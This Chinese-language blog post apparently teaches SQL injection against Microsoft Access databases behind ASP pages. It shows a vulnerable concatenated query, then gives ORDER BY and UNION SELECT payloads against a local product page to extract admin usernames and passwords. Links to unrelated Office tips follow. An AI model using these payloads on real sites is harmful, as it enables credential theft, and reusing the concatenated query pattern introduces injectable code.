Access安全防範-SQL 註入
- 2017-09-06 08:00:00
- zstmtony 原創
- 3921
SQL註入之access
access三大攻擊手法
1.access註入攻擊片段-聯閤查詢法
2.access註入攻擊片段-逐字猜解法
3.工具類的使用註入
Sql註入産生條件
1.必鬚有蔘數傳遞
2.蔘數值帶入數據庫查詢併執行
Access註入是暴力猜解
Access數據結構(access隻有一箇數據庫)
Access數據庫
錶名
列名
數據
該頁麵asp的sql語句
<%
id=request("id")
sql="select * from product where id="&id
set rs=conn.execute(sql)
%>
1.access註入攻擊片段-聯閤查詢法(union)
判斷註入
猜解錶名
猜解列名
猜解數據
Order by 22 22 代錶查詢的列名的數目有22箇
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 正常
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 錯誤
猜解錶名 確定存在admin錶名
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
猜解列名 猜解數據
http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT
1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin
錶名和列名猜解成功率不是百分百,猜解不到解決辦法?
1.字典文件收集(社工)
2.Access偏移註入
- office課程播放地址及課程明細
- Excel Word PPT Access VBA等Office技巧學習平颱
- 將( .accdb) 文件格式數據庫轉換爲早期版本(.mdb)的文件格式
- 將早期的數據庫文件格式(.mdb)轉換爲 (.accdb) 文件格式
- KB5002984:配置 Jet Red Database Engine 數據庫引擎和訪問連接引擎以阻止對遠程數據庫的訪問(remote table)
- Access 365 /Access 2019 數據庫中哪些函數功能和屬性被沙箱模式阻止(如未啟動宏時)
- Access Runtime(運行時)最全的下載(2007 2010 2013 2016 2019 Access 365)
- Activex控件或Dll 在某些電腦無法正常註冊的解決辦法(regsvr32註冊時卡住)
- office使用部分控件時提示“您沒有使用該ActiveX控件許可的問題”的解決方法
- RTF文件(富文本格式)的一些解析
- Access樹控件(treeview) 64位Office下齣現橫曏滾動條不會自動定位的解決辦法
- Access中國樹控件 在win10電腦 節點行間距太小的解決辦法
- EXCEL 2019 64位版(Office 2019 64位)早就支持64位Treeview 樹控件 ListView列錶等64位MSCOMMCTL.OCX控件下載
- VBA或VB6調用WebService(直接Post方式)併解析返迴的XML
- 早期PB程序連接Sqlserver齣現錯誤
- MMC 不能打開文件C:/Program Files/Microsoft SQL Server/80/Tools/Binn/SQL Server Enterprise Manager.MSC 可能是由於文件不存在,不是一箇MMC控製颱,或者用後來的MMC版
- sql server連接不瞭的解決辦法
- localhost與127.0.0.1區彆
- Roych的淺談數據庫開髮繫列(Sql Server)
- sqlserver 自動備份對備份目録沒有存取權限的解決辦法
- 安裝Sql server 2005 express 和SQLServer2005 Express版企業管理器 SQLServer2005_SSMSEE
| 聯繫人: | 王先生 |
|---|---|
| Email: | 18449932@qq.com |
| QQ: | 18449932 |
| 微博: | officecn01 |
